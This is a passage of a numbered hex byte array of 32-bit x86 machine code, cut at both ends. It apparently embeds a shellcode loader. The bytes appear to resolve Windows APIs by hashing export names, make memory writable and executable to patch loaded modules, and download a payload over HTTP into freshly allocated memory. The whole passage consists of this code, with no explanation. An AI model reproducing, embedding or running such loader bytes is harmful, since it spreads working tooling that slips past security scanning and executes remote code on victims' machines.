28 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01,
29 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0xc0, 0x1f, 0x00,
30 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x9d, 0x11, 0x40, 0x00, 0xbf, 0xed,
31 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8,
32 0xa5, 0x1f, 0x00, 0x00, 0xb9, 0x0f, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
33 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x92, 0x1f, 0x00, 0x00, 0xb9,
34 0xfc, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
35 0x08, 0xe8, 0x7f, 0x1f, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b,
36 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0x6c, 0x1f, 0x00,
37 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
38 0x5f, 0x89, 0x48, 0x10, 0x8b, 0x44, 0x24, 0x08, 0x83, 0x66, 0x04, 0x00,
39 0x89, 0x46, 0x08, 0x5e, 0xc3, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75,
40 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24,
41 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x08,
42 0x8b, 0x84, 0x97, 0xf4, 0x05, 0x00, 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08,
43 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84,
44 0x97, 0xb4, 0x06, 0x00, 0x00, 0x3b, 0x04, 0x93, 0x75, 0x10, 0x42, 0x83,
45 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31, 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0,
46 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e,
47 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0,
48 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2, 0x04, 0x00, 0x33, 0xc0, 0xc2, 0x08,
49 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10, 0x02, 0x56, 0x8b, 0x75, 0x08,
50 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85, 0xff, 0x74, 0x1b, 0x8b, 0x46,
51 0x1c, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, 0x8b, 0x46, 0x1c, 0x89, 0x07,
52 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b, 0x7d, 0x14, 0x85, 0xff, 0x75,
53 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0d, 0x83, 0xc6, 0x14, 0x56,
54 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, 0x33, 0xc0, 0x5f, 0x5e, 0x5d,
55 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x8b, 0x40, 0x2c, 0xff, 0x50,
56 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, 0x33, 0xc0, 0xc2, 0x08, 0x00,
57 0x56, 0x57, 0xe8, 0x76, 0x1e, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9,
58 0xae, 0x13, 0x40, 0x00, 0xbf, 0xed, 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03,
59 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0x5b, 0x1e, 0x00, 0x00, 0xb9, 0x0f,
60 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04,
61 0xe8, 0x48, 0x1e, 0x00, 0x00, 0xb9, 0xfc, 0x11, 0x40, 0x00, 0x2b, 0xcf,
62 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, 0xe8, 0x35, 0x1e, 0x00, 0x00,
63 0xb9, 0x5b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
64 0x48, 0x0c, 0xe8, 0x22, 0x1e, 0x00, 0x00, 0xb9, 0x11, 0x12, 0x40, 0x00,
65 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x10, 0xe8, 0x0f, 0x1e,
66 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
67 0x06, 0x89, 0x48, 0x14, 0xe8, 0xfc, 0x1d, 0x00, 0x00, 0xb9, 0xa9, 0x13,
68 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8,
69 0xe9, 0x1d, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
70 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, 0xd6, 0x1d, 0x00, 0x00, 0xb9,
71 0x5e, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
72 0x20, 0xe8, 0xc3, 0x1d, 0x00, 0x00, 0xb9, 0x59, 0x13, 0x40, 0x00, 0x2b,
73 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x24, 0xe8, 0xb0, 0x1d, 0x00,
74 0x00, 0xb9, 0x59, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
75 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24, 0x08, 0x83, 0x66, 0x04, 0x00,
76 0x89, 0x46, 0x2c, 0x5e, 0xc3, 0x33, 0xc0, 0xc2, 0x04, 0x00, 0x55, 0x8b,
77 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, 0x6a, 0x20, 0x50, 0x89, 0x45,
78 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, 0x8d, 0x45, 0xd4, 0x50, 0xe8,
79 0x02, 0x22, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d, 0x4d, 0xd4, 0x83, 0xc4,
80 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, 0x12,
81 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, 0x4d, 0xf8, 0x51, 0x8d, 0x4d,
82 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, 0xc0, 0x5e, 0xc9, 0xc2, 0x08,
83 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, 0x24, 0x0c, 0x85, 0xc9,
84 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x6c, 0x8b, 0x54, 0x24,
85 0x04, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x56, 0x57, 0x8b, 0x7a, 0x2c, 0x33,
86 0xf6, 0x8b, 0x84, 0xb7, 0xf4, 0x05, 0x00, 0x00, 0x3b, 0x04, 0xb3, 0x75,
87 0x08, 0x46, 0x83, 0xfe, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33, 0xf6, 0x8b,
88 0x84, 0xb7, 0xa4, 0x06, 0x00, 0x00, 0x3b, 0x04, 0xb3, 0x75, 0x0e, 0x46,
89 0x83, 0xfe, 0x04, 0x75, 0xee, 0x89, 0x11, 0xf0, 0xff, 0x42, 0x04, 0xeb,
90 0x1d, 0x33, 0xf6, 0x8b, 0x84, 0xb7, 0xb4, 0x06, 0x00, 0x00, 0x3b, 0x04,
91 0xb3, 0x75, 0x13, 0x46, 0x83, 0xfe, 0x04, 0x75, 0xee, 0x8d, 0x42, 0x08,
92 0x89, 0x01, 0xf0, 0xff, 0x42, 0x0c, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21,
93 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00,
94 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x18, 0x00,
95 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
96 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00, 0x8b, 0x44,
97 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56, 0x8b, 0x74,
98 0x24, 0x10, 0x8d, 0x86, 0x58, 0x03, 0x00, 0x00, 0x50, 0xff, 0x56, 0x30,
99 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00, 0x00, 0x00,
100 0x55, 0x57, 0x8d, 0x86, 0xc0, 0x05, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56,
101 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00, 0x00, 0xbf,
102 0x38, 0x14, 0x40, 0x00, 0x81, 0xef, 0x2c, 0x14, 0x40, 0x00, 0x0f, 0x88,
103 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
104 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, 0x00, 0x00,
105 0x57, 0xe8, 0x37, 0x1c, 0x00, 0x00, 0xb9, 0x2c, 0x14, 0x40, 0x00, 0x81,
106 0xe9, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8, 0x90, 0x20,
107 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0xff, 0x74,
108 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xd0, 0x05, 0x00,
109 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x49,
110 0xbf, 0x4e, 0x14, 0x40, 0x00, 0xbb, 0x42, 0x14, 0x40, 0x00, 0x2b, 0xfb,
111 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff,
112 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0xdd, 0x1b, 0x00, 0x00,
113 0x81, 0xeb, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8, 0x3b,
114 0x20, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0xff,
115 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40, 0xeb,
116 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51, 0x53, 0x56,
117 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x64, 0x03, 0x00, 0x00, 0x50, 0xff,
118 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
119 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x70, 0x05, 0x00, 0x00, 0x50, 0x53,
120 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
121 0x00, 0xbf, 0xc8, 0x30, 0x40, 0x00, 0x81, 0xef, 0xa9, 0x13, 0x40, 0x00,
122 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
123 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
124 0x00, 0x00, 0x57, 0xe8, 0x51, 0x1b, 0x00, 0x00, 0xb9, 0xa9, 0x13, 0x40,
125 0x00, 0x81, 0xe9, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
126 0xaa, 0x1f, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
127 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0x90,
128 0x05, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
129 0x74, 0x49, 0xbf, 0xbf, 0x30, 0x40, 0x00, 0xbb, 0xb0, 0x30, 0x40, 0x00,
130 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
131 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0xf7, 0x1a,
132 0x00, 0x00, 0x81, 0xeb, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
133 0xe8, 0x55, 0x1f, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
134 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
135 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x81,
136 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c, 0x5e, 0x33,
137 0xff, 0x8d, 0x44, 0x24, 0x28, 0x56, 0x57, 0x50, 0x89, 0x7c, 0x24, 0x1c,
138 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x38, 0x1f, 0x00, 0x00, 0x8d, 0x44,
139 0x24, 0x70, 0x89, 0x74, 0x24, 0x34, 0x8b, 0xb4, 0x24, 0x74, 0x02, 0x00,
140 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84, 0x24, 0x64,
141 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01, 0x00, 0x00,
142 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44, 0x24, 0x28,
143 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x57, 0x8d, 0x86, 0xe8, 0x06, 0x00,
144 0x00, 0x50, 0xff, 0x96, 0x90, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
145 0xac, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x57,
146 0x57, 0x0f, 0x94, 0xc0, 0x57, 0x89, 0x44, 0x24, 0x20, 0xb8, 0x00, 0x32,
147 0xe0, 0x84, 0x57, 0x57, 0x0f, 0x44, 0xd8, 0xff, 0x96, 0x94, 0x00, 0x00,
148 0x00, 0x89, 0x44, 0x24, 0x24, 0x85, 0xc0, 0x0f, 0x84, 0x7f, 0x01, 0x00,
149 0x00, 0x57, 0x57, 0x6a, 0x03, 0x57, 0x57, 0xff, 0x74, 0x24, 0x54, 0x8d,
150 0x4c, 0x24, 0x7c, 0x51, 0x50, 0xff, 0x96, 0x98, 0x00, 0x00, 0x00, 0x8b,
151 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f, 0x84, 0xfb, 0x00, 0x00,
152 0x00, 0x55, 0x57, 0x53, 0x57, 0x57, 0x57, 0x8d, 0x84, 0x24, 0x7c, 0x01,
153 0x00, 0x00, 0x50, 0x8d, 0x86, 0xe8, 0x07, 0x00, 0x00, 0x50, 0x51, 0xff,
154 0x96, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xca,
155 0x00, 0x00, 0x00, 0x39, 0x7c, 0x24, 0x18, 0x74, 0x20, 0xf7, 0xc3, 0x00,
156 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d, 0x44, 0x24, 0x20, 0xc7,
157 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50, 0x6a, 0x1f, 0x55, 0xff,
158 0x96, 0x9c, 0x00, 0x00, 0x00, 0x57, 0x57, 0x57, 0x57, 0x55, 0xff, 0x96,
159 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x8a, 0x00, 0x00, 0x00,
160 0x57, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00,
161 0x00, 0x50, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x68, 0x13, 0x00, 0x00, 0x20,
162 0x55, 0xff, 0x96, 0xb0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x67, 0x81,
163 0x7c, 0x24, 0x14, 0xc8, 0x00, 0x00, 0x00, 0x75, 0x5d, 0x57, 0x8d, 0x44,
164 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d,
165 0x9e, 0x18, 0x09, 0x00, 0x00, 0x53, 0x68, 0x05, 0x00, 0x00, 0x20, 0x55,
166 0x89, 0x3b, 0x89, 0x7b, 0x04, 0xff, 0x96, 0xb0, 0x00, 0x00, 0x00, 0x85,
167 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04, 0x74, 0x2c, 0x6a, 0x04,
168 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x57, 0xff, 0x56, 0x3c, 0x89,
169 0x86, 0x20, 0x09, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x15, 0x8d, 0x4c, 0x24,
170 0x20, 0x89, 0x7c, 0x24, 0x20, 0x51, 0xff, 0x33, 0x50, 0x55, 0xff, 0x96,
171 0xa0, 0x00, 0x00, 0x00, 0x8b, 0xf8, 0x55, 0xff, 0x96, 0xa4, 0x00, 0x00,
172 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x96, 0xa4, 0x00, 0x00, 0x00, 0x5d,
173 0xff, 0x74, 0x24, 0x24, 0xff, 0x96, 0xa4, 0x00, 0x00, 0x00, 0x85, 0xff,
174 0x74, 0x4e, 0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x45, 0xff,
175 0xb6, 0x18, 0x09, 0x00, 0x00, 0x8b, 0x9e, 0x20, 0x09, 0x00, 0x00, 0x8d,
176 0x86, 0x08, 0x09, 0x00, 0x00, 0x53, 0x50, 0x8d, 0x86, 0xf8, 0x08, 0x00,
177 0x00, 0x50, 0xe8, 0x48, 0x1a, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86,
178 0xf0, 0x07, 0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0x11, 0x19, 0x00,
179 0x00, 0x83, 0xc4, 0x1c, 0x3b, 0x83, 0x18, 0x05, 0x00, 0x00, 0x75, 0x0c,
180 0x3b, 0x93, 0x1c, 0x05, 0x00, 0x00, 0x75, 0x04, 0x8b, 0xc7, 0xeb, 0x02,
181 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3,
182 0x81, 0xec, 0xdc, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24,
183 0xf0, 0x01, 0x00, 0x00, 0x57, 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78,
184 0x85, 0xc0, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b,
185 0x5f, 0x18, 0x85, 0xdb, 0x0f, 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47,
186 0x1c, 0x33, 0xd2, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24,
187 0x24, 0x8b, 0x47, 0x20, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47,
188 0x24, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6,
189 0x8a, 0x08, 0x84, 0xc9, 0x74, 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94,
190 0x24, 0xe8, 0x00, 0x00, 0x00, 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88,
191 0x0c, 0x02, 0x40, 0x8a, 0x08, 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24,
192 0x10, 0x8b, 0xb4, 0x24, 0xf4, 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10,
193 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00,
194 0x00, 0x00, 0xc6, 0x84, 0x14, 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4,
195 0x24, 0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0x47, 0x18, 0x00, 0x00, 0x89,
196 0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0,
197 0xfc, 0x89, 0x54, 0x24, 0x1c, 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10,
198 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24,
199 0x04, 0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0x16, 0x18, 0x00, 0x00,
200 0x33, 0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b,
201 0x84, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc,
202 0x01, 0x00, 0x00, 0x74, 0x1d, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04,
203 0x89, 0x44, 0x24, 0x10, 0x83, 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f,
204 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44,
205 0x24, 0x20, 0x8b, 0x4c, 0x24, 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b,
206 0x0c, 0x81, 0x03, 0xce, 0x3b, 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c,
207 0x03, 0xc7, 0x3b, 0xc8, 0x73, 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e,
208 0x8d, 0x7c, 0x24, 0x28, 0x8b, 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73,
209 0x11, 0x8a, 0x06, 0x88, 0x04, 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42,
210 0x46, 0x80, 0x3e, 0x00, 0x75, 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c,
211 0x6c, 0x00, 0x42, 0x03, 0xca, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d,
212 0x74, 0x24, 0x68, 0x2b, 0xf1, 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01,
213 0x42, 0x88, 0x04, 0x0e, 0x41, 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4,
214 0x24, 0xf0, 0x01, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44,
215 0x14, 0x6c, 0x00, 0xff, 0x56, 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c,
216 0x24, 0x68, 0x51, 0x50, 0xff, 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33,
217 0xc9, 0x8b, 0xc1, 0xe9, 0x5b, 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24,
218 0x0c, 0x57, 0x33, 0xff, 0x8b, 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b,
219 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85,
220 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c,
221 0x8b, 0x4e, 0x14, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50,
222 0x08, 0x89, 0x7e, 0x14, 0x8b, 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b,
223 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85,
224 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c,
225 0x8b, 0x4e, 0x08, 0x85, 0xc9, 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50,
226 0x2c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e,
227 0x08, 0x8b, 0x4e, 0x04, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff,
228 0x50, 0x08, 0x89, 0x7e, 0x04, 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b,
229 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44,
230 0x24, 0x04, 0x83, 0xc0, 0x10, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
231 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40,
232 0x00, 0x80, 0xc2, 0x10, 0x00, 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24,
233 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff, 0x74, 0x24, 0x14,
234 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00, 0xb8, 0x01, 0x40,
235 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24, 0x14, 0x85, 0xff,
236 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16, 0x56, 0x8b, 0x74,
237 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, 0x8b,
238 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2, 0x10, 0x00, 0x8b,
239 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
240 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x08,
241 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45, 0x08, 0xff, 0x75,
242 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75, 0x1c, 0xff, 0x75,
243 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff, 0x52, 0x2c, 0x5d,
244 0xc2, 0x24, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x04, 0x02, 0x00, 0x00,
245 0x53, 0x56, 0x57, 0xe8, 0xa5, 0x15, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0xb9,
246 0xd2, 0x1d, 0x40, 0x00, 0xbf, 0xed, 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03,
247 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0x8b, 0x15, 0x00, 0x00, 0xb9, 0x8a,
248 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04,
249 0xe8, 0x78, 0x15, 0x00, 0x00, 0xb9, 0x5b, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
250 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, 0xe8, 0x65, 0x15, 0x00, 0x00,
251 0xb9, 0xf7, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
252 0x48, 0x0c, 0xe8, 0x52, 0x15, 0x00, 0x00, 0xb9, 0xcd, 0x1a, 0x40, 0x00,
253 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x10, 0xe8, 0x3f, 0x15,
254 0x00, 0x00, 0xb9, 0xa9, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
